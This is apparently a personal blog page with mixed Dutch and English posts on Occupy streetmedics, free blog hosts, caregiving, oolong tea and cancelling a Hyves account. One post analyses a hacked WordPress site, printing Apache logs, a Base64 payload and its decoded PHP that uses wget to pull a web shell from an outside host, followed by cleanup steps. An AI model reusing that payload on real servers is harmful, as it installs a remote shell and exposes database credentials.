December 16th, 2011 by Rudolf

Gewonde Politie geholpen door streetmedics van Occupy Den Haag

Zoals meerdere van jullie al weten  doe ik sinds 16 oktober 2011 ook mee aan de organisatie Eerste Hulp bij Akties deze coördineren landelijk vrijwillige getrainde EHBO’ers om mee te lopen tijdens akties en demonstraties door heel Nederland. Dan ga je denken waarom EHBO tijdens een aktie het is toch veilig hier in Nederland?

Hoewel hulpdiensten meestal binnen enkele minuten ter plekke zijn bij een ongeval kunnen de eerste minuten levensreddend zijn. Je moet hierbij denken aan een ernstige bloeding of hartstilstand. Getrainde Streetmedics (EHBO’ers) kunnen ernstige bloedingen verzorgen, hart reanimatie geven totdat de hulpdiensten beschikbaar zijn eventueel een aanwezige AED(automatische defebrilator) bedienen. Afkoeling en Shock bestrijden.

Bij charges door de ME kunnen ze verwondingen van demonstranten verzorgen onder andere kneuzingen voorzien van instant coldpacks. Een eventuele botbreuk immobiliseren. Het flushen van neus, mond en ogen van een demonstrant als ze bespoten worden met pepperspray.

Nou ga je denken dat de taken van een Occupy Streetmedic zich alleen maar beperken tot de actievoerders. Dit is vanuit het Occupy Principe niet eens mogelijk. Wij zijn er voor iedereen die hulp nodig hebben. Dus ook passanten die langslopen of die we tegen komen onderweg naar onze standplaatsen.

Een goed voorbeeld is gisteren 15 december 2011 omstreeks 17.00 u precies 2 maanden nadat Occupy van start is gegaan. In Den Haag staat er aan de overkant van het Malieveld een ESSO station nabij dit station is er door een auto een brommer geschept.

De brommerrijder is met een smak op zijn rug op het fietspad geland en is daar blijven liggen. Binnen de minuut waren er twee Occupy Den Haag Steetmedics waaronder ik ter plekke. Samen met een andere automobilist die was gestopt en overduidelijk EHBO’er bleek te zijn en een agente in burger.

Het slachtoffer is aangesproken, veilig gesteld van naderend verkeer,  beschermd tegen de kou met een speciale foliedeken die standaard in onze Streetmedic uitrusting zit. Verder is het slachtoffer rustig gehouden en tijdelijk geimmobiliseerd tot de ambulance kwam en de zorg overnam.

Dit is duidelijk een goed voorbeeld hoe burgers met elkaar om moeten gaan, goede training zorgt voor eerste hulp op het juiste moment en het tijdig kunnen alarmeren van de hulpdiensten. Nou hadden we veel geluk dat we daar met 4 EHBO’ers stonden rond het slachtoffer. Helaas is de realiteit zo dat er weinigen daadwerkelijk een EHBO certificaat in bezit hebben of deze hebben laten verlopen.  Waardoor er vaak bij ongevallen hulp aan een slachtoffer wordt onthouden omdat men bang of onzeker is om te helpen.

Vanuit het Occupy gedachte wil ik hieraan verandering in gaan brengen. Al een tijd geleden heb ik mijn oude Medic First Aid instructeursschap laten vallen. Nu heb ik het vorige maand maar toch gewaagd en een omscholing gedaan naar het Emergency First Response programma. Dit zodat ik als instructeur nieuwe Streetmedics kan opleiden die hulp durven te geven ondanks de situatie.

Het slachtoffer bleek overigens een politieagent in burger te zijn dus was hij op zich het perfecte slachtoffer voor een case scenario  hoe eerste hulp verlening in een ideale situatie uit zou moeten zien. Hoe meer First Responders er zijn hoe rustiger en veiliger het verloop van de hulpverlening gaat, hoe veiliger het slachtoffer zich voelt en hoe sneller professionele hulp kan worden ingeschakeld.

Wij van het Streetmedic team in Den Haag willen dus hierbij een dank geven aan de anonieme bestuurder van de auto die te hulp schoot, de agente in burger die de plaats van het ongeval veilig heeft gehouden. Mijn mede team maatje van de Streetmedics de EHBA voor het geven van voldoende voorlichting en natuurlijk het ambulance team die supersnel ter plekke waren.

Binnenkort hoop ik de tijd te hebben om een workshop te geven, hoe wij als mens ons dienstbaar kunnen opstellen in een noodgeval om anderen zonder angst te helpen.

Ook wil ik graag andere vrijwilligers aanmoedigen die zich getrokken voelen tot het geven van diensten als vrijwillige Streetmedic om contact met me op te zoeken. OOK al heb je nog geen EBHO kennis, ik ben een EHBO instructeur en ik kan deze training dus ook geven tegen een kleine vergoeding van materiaalkosten. De Training die ik geef is inclusief het leren gebruiken van een AED(automatische defibrillator)

Om je een idee te geven wat je te wachten staat tijdens training zie filmpje hieronder (in het Engels)

Den Haag, EHBA, EHBO, Emergency First Responder, Emergency First Response, First Aid, Gewonde Politie geholpen door Occupy Den Haag Streetmedics, Medic First Aid, Occupy, Streetmedics

November 12th, 2010 by Rudolf

Gratis Blogs

sites waar je gratis blogs kan aanmaken

Er zijn vele hosting providers die gratis blogs aanbieden niet allemaal zijn even makkelijk voor de beginner en bieden voldoende functionaliteit voor de meer gevorderde gebruikers.

Er zijn meerdere hosts te vinden die gebruiken maken van de multiuser variant van WordPress. WordPress is op zichzelf uitstekende volmaakte blog software die door veel beginnende en gevorderde bloggers wordt gebruikt omdat het veel funtionaliteit bied. De multiuser variant heeft op zich dezelfde kwaliteiten als de alleenstaande wordpress installatie maar het heeft als voordeel dat 1 domein naam duizenden blogs kan hosten zonder dat wordpress iedere keer opnieuw moet worden geinstalleerd.

Welke blog provider het beste voor je is zal een kwestie van gewenning en smaak zijn. Meeste mensen kiezen uiteindelijk voor een wordpress variant aangezien het heel erg makkelijk in de omgang is.

Waar je ook naar moet kijken is of je op je aangemaakte blog reclame mag draaien, want wie zou niet een klein beetje willen bijverdienen? Zeker als je een of meerdere populaire blogs hebt dan wil je best wel een graantje meepikken het blijft immers jouw inhoud. Google Adsense en Daisycon Affliliates zijn populair onder bloggers die geld verdienen met hun inhoudelijke sites.
Hier volgt een lijst van providers die gratis blogs aanbieden en je ook laten adverteren:

Gratis Blogs

October 30th, 2010 by Rudolf

WordPress xmlrpc.php flaw exploited to install a “WSO 2.1 Web Shell by oRb”

Below you can see in the copy of the apache logs how the Russian exploiter first creates an account on the exploitable wordpress system. It is useful to disable automated registrations on your wordpress system. However sometimes you want this to be open if you have a forum installed on your wordpress system.

95.52.64.98 – - [30/Oct/2010:17:10:49 +0200] “POST /wp-login.php?action=register HTTP/1.1″ 302 20 “http://www……..org/wp-login.php?action=register” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

95.52.64.98 – - [30/Oct/2010:17:11:17 +0200] “POST /wp-login.php HTTP/1.0″ 302 – “http://www…….org/wp-login.php” “Opera”

After logging in you can see how the cracker installs his remote shell remotely from another compromised website by abusing an exploit in xmlrpc.php file.

95.52.64.98 – - [30/Oct/2010:17:11:20 +0200] “POST /xmlrpc.php HTTP/1.0″ 200 4366 “cHJpbnQgJzxtYWdpY19zZW9fdG9vbHo+JztwYXNzdGhydSgid2dldCBodHRwOi8vd3d3LmVkdHV0b3JpYWwubmV0L3dfb2xkLnR4dDsgbXYgd19vbGQudHh0IGNhY2hlLnBocDsgbHMgLWFsOyBwd2QiKTtleGl0Ow==” “Opera”

95.52.64.98 – - [30/Oct/2010:17:11:22 +0200] “POST /wp-admin//options-permalink.php HTTP/1.0″ 200 9491 “http://www…….org/wp-admin//options-permalink.php” “Opera”

You can read that the xmlrpc.php is injected with Base64 encoded input. If you decode the Base64 encoded string it reads something like this:

print ‘<magic_seo_toolz>’;passthru(“wget http://www.edtutorial.net/w_old.txt; mv w_old.txt cache.php; ls -al; pwd”);exit;

This is php code to retrieve a remotely hosted file w_old.txt and renaming it to cache.php file on the server.

cache.php is the name of the remote web shell you can access this file yourself if no password has been set by the cracker. Main issue with this shell is that the wp-config.php is readable as text so your database username and password are compromised, you must change your password after you fixed the issue!

95.52.64.98 – - [30/Oct/2010:17:12:14 +0200] “POST /cache.php HTTP/1.1″ 200 4510 “/cache.php” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)”

How was this possible? First of all the webroot directory had the wrong permissions 777 and second the wordpress installation was one year old and had some XML-RPC exploitable issues.

How to fix this once your site has been compromised?

1. The permissions of the webroot must be changed to 755.
2. Then the wordpress installation must be deleted and a whole new install must be copied to the server.  Be sure to retain a copy of the web shell for your hosting security officer.
3. After this the password of the wordpress database username has to be changed.
4. The wordpress database must be restored from a backup so any spam links injected since the crack are removed.
5. The wordpress database must be upgraded, can be done by the admin via wp-admin.
6. Last but not least the whole shared server had to be scanned for any extra shells owned by user www-data, httpd or user apache depending on the operating system. So if you are hosted on a shared hosting platform you must inform your security officer that your wordpress installation was compromised so he/she can perform a security check of the server.
7. Backup, backup, backup! Be sure to always have multiple backups of your wordpress database on your own pc. This exploit is mostly abused by blackhat SEO companies to spamvertise their websites via your RSS feed and having a “clean” backup will save you a lot of time.

If in doubt and you are in need of help contact me

If this post has been useful for you buy me coffee donate to my PayPal :-p

(c) Rudolf Maduro 2010

FilesMan, Hacked, magic_seo_toolz, Web Shell by oRb, Wordpress Security, WSO 2.1

October 12th, 2010 by Rudolf

Mantelzorg overkomt je

Niemand zal vrijwillig mantelzorger worden dit is een situatie wat je overkomt. Het is zorgwekkend hoe er in Nederland met mantelzorgers wordt omgegaan. Zowel de gemeente als zorgverleners bieden veel te weinig ondersteuning om deze groep goedbedoelende burgers tegemoet te komen. Netto resultaat 50% van de mantelzorgers hebben last van een klinische depressie. Lees verder….

helft van mantelzorgers depressief, mantelzorg overkomt je

September 30th, 2010 by Rudolf

Wulong Thee en afvallen

Wulong thee oftwel oolong thee wordt geacht vetverbrandende eigenschappen te hebben die helpen bij het afvallen. Nou is wulong thee een theesoort dat tussen groene thee en donkere thee inzit. Wu Long thee bevat minder theïne dan zwarte thee en iets meer dan de groene thee.

Alhoewel als we het moeten hebben over de vetverbrandings eigenschappen of het tegengaan van de aanmaak van vetten uit koolhydraten dan is wulong thee even effectief als groene thee. Het komt erop neer dat je alsnog moet opletten dat je gezond blijft eten en moet minderen als je effectief wilt afvallen want het is geen zeker geen magisch wondermiddel.

Als het om smaak gaat dan kiezen meeste mensen voor de wulong thee ook al is het een stuk duurder dan reguliere groene thee.

afvallen met thee, Afvallen zonder dieet, oolong thee, wulong thee

September 28th, 2010 by Rudolf

Opzeggen Hyves Account
Het opzeggen van je hyves account kan niet via de hoofdpagina van Hyves. Om je hyves account op te zeggen kan je gebruik maken van de onderstaande opzeg link: http://www.hyves.nl/index.php?l1=ut&l2=da

Geef een willekeurige reden op voor afmelding (als je nog niet was ingelogd op hyves moet even inloggen).  Je krijgt hierna een mailtje ter bevestiging met een enkele vragen en hierna is je account opgedoekt.

PS. Als je reden voor opzeggen de recente overname is door TMG en je blog of gegevens niet meer veilig acht onder het toeziend oog van de Telegraaf dan zou je eventueel kunnen overwegen om een account te nemen op http://0rg.nl dit is een onafhankelijk gratis blog provider waar je anoniem kan bloggen en je mening kan uiten. Ik kan je helaas niet afmelden voor hyves dit moet je zelf doen via de bovenstaande link. Als je verder nog een goldmembership hebt dan zal deze ook worden gewist. Vond je deze informatie nuttig? Laat dan een commentaar achter

Opzeggen Hyves Account